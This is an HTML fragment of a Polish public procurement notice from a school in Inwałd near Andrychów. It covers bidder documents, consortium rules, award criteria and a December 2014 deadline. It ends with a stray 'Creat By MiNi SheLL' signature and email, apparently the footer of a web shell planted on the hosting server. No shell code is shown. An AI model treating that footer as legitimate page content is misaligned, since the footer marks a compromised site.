<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	formularz ofertowy (według wzoru - załącznik nr 4 do SIWZ).

2.	listę pomiotów należących do tej samej grupy kapitałowej (w rozumieniu ustawy z dnia 16 lutego              2007 r. o ochronie konkurencji i konsumentów Dz. U . Nr 50 poz.331 z późn . zm. )w przypadku gdy Wykonawca należy do grupy kapitałowej .

Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Pisemne  zobowiązanie podmiotu trzeciego, należy załączyć do oferty w oryginale, zawierające podpis podmiotu trzeciego pod treścią oświadczenia . 

Jeżeli Wykonawca polega na zdolnościach finansowych innych podmiotów za zasadach określonych              w art. 26 ust. 2b ustawy Prawo zamówień publicznych, to Zamawiający wymaga przedłożenia informacji banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których ten podmiot posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową podmiotu, wystawionej nie wcześniej niż 3 miesiące przed upływem składania ofert.
Dotyczy Wykonawców składających wspólną ofertę:
W przypadku wspólnego ubiegania się o udzielenie zamówienia wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
Dokumenty, o których mowa w SIWZ w pkt A 1, 2, 3 oraz pkt. C 1, składają wszyscy wykonawcy wspólnie ubiegający się o udzielenie zamówienia lub ich pełnomocnik. 
Dokumenty, o których mowa w SIWZ w   pkt B 1, 2 oraz  C 2 składa we własnym imieniu każdy z podmiotów wspólnie ubiegających się o udzielenie zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Odległość miejsca przygotowywania posiłków od miejsca ich dostarczania - 20</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.andrychow.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W sekretariacie
Zespołu Szkół Samorządowych w Inwałdzie, ul. Wadowicka 79, 34-120 Andrychów, w godzinach od
8:00 do 15:00 w dniach pracy szkoły lub za zaliczeniem pocztowym..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.12.2014 godzina 08:45, miejsce: sekretariat Zespołu Szkół Samorządowych w Inwałdzie,                                         ul. Wadowicka 79,    34 - 120 Andrychów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com